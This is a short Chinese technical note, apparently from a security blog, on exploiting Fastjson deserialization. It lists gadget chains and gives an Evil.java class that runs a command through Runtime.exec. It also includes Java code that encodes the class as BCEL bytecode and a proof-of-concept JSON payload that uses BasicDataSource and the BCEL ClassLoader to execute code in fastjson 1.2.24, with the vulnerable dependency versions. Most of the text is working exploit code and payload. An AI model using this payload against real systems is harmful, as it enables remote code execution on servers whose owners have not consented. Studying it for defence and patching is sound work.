Fastjson漏洞
Fastjson漏洞
BCEL ClassLoader(com.sun.org.apache.bcel.internal.util.ClassLoader)在jdk8u261删除了
利用链有下面三个:
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
com.sun.rowset.JdbcRowSetImpl
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
BCEL ClassLoader利用
javac Evil.java
public class Evil {
static {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (Exception e) {}
}
}
Evil.class生成BCEL形式的字节码
JavaClass cls = Repository.lookupClass(Evil.class);
String code = Utility.encode(cls.getBytes(), true);
System.out.println(code);
// Class.forName("$$BCEL$$" + code, true, new ClassLoader());
new ClassLoader().loadClass("$$BCEL$$" + code).newInstance();
poc利用
public static void loadFastJson() throws Exception {
JavaClass cls = Repository.lookupClass(Evil.class);
String code = Utility.encode(cls.getBytes(), true);
String poc = "\n" +
"{\n" +
" {\n" +
" \"aaa\": {\n" +
" \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
" \"driverClassLoader\": {\n" +
" \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
" },\n" +
" \"driverClassName\": \"$$BCEL$$" + code + "\"\n" +
" }\n" +
" }: \"bbb\"\n" +
"}";
JSON.parse(poc);
System.out.println(poc);
}
依赖
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.24</version>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>8.5.55</version>
</dependency>
同样的代码,如果在Java 8u261下执行,则会出现一个异常,Java将BCEL升级到6.0时删除了ClassLoader版本的BCEL
tomcat 6.0.53, 7.0.81等版本是org.apache.tomcat.dbcp.dbcp.BasicDataSource
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>dbcp</artifactId>
<version>6.0.53</version>
</dependency>
poc的完整写法
{
{
"@type": "com.alibaba.fastjson.JSONObject",
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l$8b$I$A$..."
}
}: "x"
}
最后由 不一样的少年 编辑于2022年03月11日 14:37